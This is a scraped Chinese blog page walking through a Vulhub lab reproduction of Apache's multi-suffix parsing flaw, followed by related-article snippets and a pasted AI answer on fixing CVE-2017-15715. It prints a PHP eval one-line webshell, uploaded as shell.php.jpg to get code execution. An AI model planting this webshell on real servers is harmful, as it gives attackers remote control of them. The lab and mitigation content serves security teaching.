Apache解析漏洞复现

最新推荐文章于 2024-10-09 20:20:19 发布
最新推荐文章于 2024-10-09 20:20:19 发布
阅读量675 收藏 2
点赞数 1
文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wutiangui/article/details/132873650
版权

一、多后缀解析漏洞
1.漏洞说明
配置apache时,对于apache配置不熟练,配置命令不清楚,在配置PHP文件处理程序时,配置命令存在问题:位于漏洞环境目录的
conf/docker-php.conf里的配置命令(AddHandler application/x-httpd-php
.php),该命令会将后缀中只要含有.php的文件都会被处理程序解析,这导致攻击者可通过多后缀绕过文件上传限制以.php结尾的机制,并使之被处理程序执行。
版本条件:Apache 1.x和Apache 2.x
2.搭建环境
cd vulhub/httpd/apache_parsing_vulnerability]
docker-compose up -d
在这里插入图片描述在这里插入图片描述

3.漏洞复现
打开文本编辑器,构造一句话木马,<?php @eval($_POST["fname"]);?>
文件命名为shell.php.jpg,将该文件上传
在这里插入图片描述

hackbar连接http://192.168.25.128/uploadfiles/shell.php.jpg

最低0.47元/天 解锁文章
Apache httpd漏洞复现
m0_56578216的博客
09-07 751
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。该漏洞Apache、php版本无关,属于用户配置不当造成的解析漏洞。在有多个后缀的情况下,只要一个文件含有。在解析PHP时, l.php\x0A 将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。来到httpd/apache_parsing_vulnerability靶场。来到httpd/apache_parsing_vulnerability靶场。后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。
[中间件漏洞]apache漏洞复现
紫洋的博客
05-25 1466
其2.4.0~2.4.29版本中存在 一个解析漏洞,在解析PHP时,1.php\x0a将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。Apache默认一个文件可以有多个以点分割的后缀,当最右边的后缀无法识别,则继续向左识别,直到识别到合法后缀才进行解析。最后一个后缀名为.jpg,合法,因为文件名info.php.jpg中包含.php,所以解析为php文件。在有多个后缀的情况下,只要包含.php后缀的文件就会被识别出php文件进行解析,不需要是最后一个后缀。先创建文件,文件内容为phpinfo。
Apache漏洞复现
人若有志,就不会在半坡停止。
10-13 1745
的路径穿越符,当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->.,转换完成后会判断是否存在…如果路径中存在%2e./形式,就会检测到,但是出现.%2e/这种形式时,就不会检测到,原因是在遍历到第一个.字符时,此时检测到后面的两个字符是%2而不是./,就不会把它当作路径穿越符处理,因此可以使用.%2e/或者%2e%2e绕过对路径穿越符的检测实现目录遍历。复制路径进行访问,成功查看到phpinfo的信息,说明上传的文件被执行。
Apache文件解析漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-01 759
使用Docker复现Apache文件解析漏洞1.使用Docker搭建环境1.首先拉取一个基础镜像2.启动一个容器3.进入容器4.更换apt源5.安装web环境6.启动apache7.检查环境是否部署完毕2.漏洞复现3.把Docker容器打包为镜像 1.使用Docker搭建环境 1.首先拉取一个基础镜像 docker pull ubuntu:18.04 2.启动一个容器 docker run -...
漏洞复现--Apache Ofbiz XML-RPC RCE(CVE-2023-49070)
qq_53003652的博客
12-07 2342
近日,亚信安全CERT监控到Apache OFBiz发布更新公告,修复了Apache OFBiz中的一个未授权远程代码执行(CVE-2023-49070)。该漏洞源于Apache OFBiz中存在不再维护的XML-RPC组件。XML-RPC是一种远程过程调用协议,它支持应用程序之间通过XML进行通信。虽然XML-RPC曾经被广泛使用,但由于安全问题,它已被弃用。利用该漏洞攻击者可以在受影响的Apache OFBiz服务器上执行任意代码,而无需事先进行任何身份验证。
漏洞复现篇——Apache解析漏洞
爱国小白帽
02-17 4014
漏洞原理: Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.a.b的“.a”和”.b” 这两种后缀是apache不可识别解析,apache就会把test.php.a.b解析成test.php。 实验环境: PHPstudy Apache服务器(wamp2.0) 实验模拟: 在www目录下创建名为1.php.a.b的文件 ...
Apache换行解析漏洞复现(CVE-2017-15715)
weixin_57379923的博客
08-04 743
靶机:由 centos7 搭建的 vulhub,IP:192.168.100.40。浏览器访问上传的文件在文件名后添加 %0a 进行访问。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!作 者:PeiyuJue。
【linux】 apache多后缀文件解析漏洞复现
2401_83817843的博客
04-19 846
由于管理员的错误配置, AddHandler application/x-httpd-php .php,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。还是可以解析,证明不管php是不是在最后面,哪怕在中间,也能被解析
【vulhub靶场】Apache 中间件漏洞复现
M372109150的博客
05-10 2512
本文主要是对apache中间件漏洞复现,包括Apache HTTPD 换行解析漏洞(CVE-2017-15715)、Apache多后缀解析漏洞apache_parsing_vulnerability)、Apache路径穿越漏洞(CVE-2021-41773)、Apache路径穿越漏洞(CVE-2021-42013)、Apache SSI 远程命令执行漏洞
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
热门推荐
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
记一次:Apache Log4j2 漏洞复现(详细过程)
Lisoning的博客
10-09 3797
Apache Log4j2漏洞复现及相关知识原理
Apache学习笔记(详解,漏洞复现,基线检查)
qq_66934029的博客
09-29 2376
Apache 2.4.0-2.4.29当中存在,在上述版本当中,Apache开启了正则表达式的多行属性,在匹配.php$文件时除了会匹配到的.php结尾的文件还会匹配到.php\0a结尾的文件,在业务环境中.php结尾的文件会交由PHP解释器执行,所以黑客可以上传.php\0a结尾对的文件来绕过上传限制,并且让文件中的内容按照PHP代码来执行。MaxKeepAliveRequests指令限制每个连接允许的请求数,打开KeepAlive时,如果将其设置为0, 则将允许无限制的请求。默认设置一般即符合要求。
web服务器/中间件漏洞系列4:apache漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
11-30 5859
apache 简介: Apache 是世界使用排名第一的Web 服务器软件。它可以运行在几乎所有广泛使用的 计算机平台上,由于其 跨平台 和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将 Perl/ Python等 解释器编译到服务器中。 一、多后缀名解析漏洞 复现环境: docker : vulhub/httpd/apache_parsing_vulnerability 1、漏洞简介 漏洞成因: Apache文件解析漏洞与用户的配置有密切的关系,严格来说属.
安全中级3:apache中间件漏洞
weixin_62870380的博客
06-06 1728
运维人员在配置http的默认配置文件的时候,开启了AddHandler application/x-httpd-php .php,虽然限制住了php文件,但是我们可以添加后缀.jpg,只要我们的后缀含有一个php文件就可以解析,没必要是最后一个后缀。我们上传php文件的时候,我们的服务器拒绝上传,但是 apache在配置文件的http.conf的时候开启了SSI(服务器端包含)服务,允许我们的html页面上传shtml文件,而我们的cgi是前端的一个脚本,我们利用他的语法执行任意的命令。
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
Li-D的博客
09-16 500
漏洞描述 Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 漏洞影响版本 Apache HTTPD 2.4.0~2.4.29版本 漏洞危害 攻击者可以利用此问题绕过安全限制并执行未经授权的操作。这可能有助于进一步的攻击。 漏洞分析 在Apache 2.4.0到2.4.29版本中使用到了如下的配置信息: 这是一个php文件的解析
服务器解析漏洞有哪些?IIS\APACHE\NGINX解析漏洞利用
白帽黑客八哥的博客
12-19 2479
解析漏洞是指在Web服务器处理用户请求时,对输入数据(如文件名、参数等)进行解析时产生的漏洞。这种漏洞可能导致服务器对用户提供的数据进行错误解析,使攻击者能够执行未经授权的操作。解析漏洞通常涉及到对用户输入的信任不足,攻击者可以通过构造恶意输入来绕过服务器的安全机制。
【中间件漏洞Apache HTTPD 漏洞全集复现(基于Vulhub平台)
Continuejww的博客
09-11 1013
①CVE-2017-15715 ②多后缀解析漏洞 ③远程命令执行漏洞 ④CVE-2021-41773 ⑤CVE-2021-42013 ⑥CVE-2021-40438
Apache Tomcat文件包含漏洞复现(详细教程)
weixin_60838266的博客
07-18 4343
Tomcat是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接,Connector表示接收请求并返回响应的端点。即Connector组件负责接收客户的请求,以及把Tomcat服务器的响应结果发送给客户。
Apache漏洞原理与复现
LJH1999ZN的博客
03-30 4131
一、Apache简介 Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。 二、Apache的历史漏洞 Apache路径穿越漏洞(CVE-2021-41773) Apache 路径穿越漏洞(CVE-2021-42013) Apache SSRF漏洞(CVE-
Apache 文件解析漏洞
最新发布
03-22
<think>好的,我现在需要处理用户关于Apache文件解析漏洞CVE-2017-15715的修复方案的询问。首先,我需要回顾用户提供的引用内容,确保准确理解漏洞的成因和现有信息。 根据引用[1]和[2],这个漏洞主要涉及Apache HTTPD 2.4.0到2.4.29版本中,由于使用正则表达式匹配.php文件时,$符号错误地匹配了换行符(\x0a)。攻击者上传带有换行符的文件名(例如“test.php\x0a”)时,会绕过安全配置,导致文件被当作PHP执行。因此,修复的关键在于修正正则表达式,避免匹配换行符。 接下来,用户需要具体的修复方案和CVE编号。CVE编号已经明确是CVE-2017-15715,这点需要确认引用中的内容是否一致。引用[1]、[2]、[3]、[4]都提到了这个CVE编号,所以正确无误。 修复方案方面,引用[2]指出问题出在FilesMatch的正则表达式使用了\.php$,而$在正则表达式中默认不匹配换行符,但Apache的配置中可能启用了Multiline属性,导致$可以匹配换行符。正确的做法是修改正则表达式,严格匹配文件名结尾,不使用多行模式。例如,将正则表达式改为\.php$,并确保没有启用Multiline标志。或者更严格地使用\\.php$(转义点)并在末尾使用\z来明确匹配字符串结束,避免换行符的影响。 此外,升级到Apache HTTPD 2.4.30及以上版本是官方解决方案,因为该版本已修复此问题。用户若无法立即升级,可以手动修改配置文件,调整FilesMatch的正则表达式。 还需要考虑其他防御措施,比如文件上传时对文件名进行严格过滤,禁止换行符等特殊字符,以及限制上传文件的执行权限。这些补充措施能增强整体安全性,防止类似漏洞被利用。 最后,生成相关问题时要围绕漏洞原因、修复方法、升级影响、检测方法和相关漏洞展开,确保问题覆盖用户可能关心的其他方面。</think>### Apache 文件解析漏洞(CVE-2017-15715)修复方案 #### 漏洞概述 Apache HTTPD 换行解析漏洞(CVE-2017-15715)影响 2.4.0 至 2.4.29 版本。攻击者可通过在文件名末尾添加换行符(如 `test.php\x0a`),绕过服务器对 PHP 文件的解析规则,导致非预期文件(如图片)被解析为 PHP 脚本执行[^1][^2]。 #### 漏洞成因 配置文件 `docker-php.conf` 中的正则表达式 `\.php$` 错误匹配了换行符 `\n`(十六进制 `0x0a`),导致包含换行符的文件名(如 `test.php\n`)被识别为 PHP 文件[^2]。 #### 修复方案 1. **升级 Apache HTTPD 版本** 官方修复版本为 **Apache HTTPD 2.4.30 及以上**,升级后正则表达式匹配逻辑已修正[^3]。 2. **手动修改配置文件** 若无法立即升级,可调整正则表达式,禁止匹配换行符: ```apache <FilesMatch \.php$> → <FilesMatch \.php\z> ``` 使用 `\z` 替代 `$` 严格匹配字符串末尾,避免匹配换行符[^2]。 3. **文件上传验证** 在服务器端对上传文件名进行过滤,禁止包含换行符(`\x0a`)或其他特殊字符。 4. **限制文件执行权限** 配置上传目录禁止执行 PHP 脚本,例如通过 `.htaccess` 添加: ```apache php_flag engine off ``` #### 漏洞复现与验证 可通过 Vulhub 靶场(`httpd/CVE-2017-15715`)快速搭建测试环境,验证修复效果[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值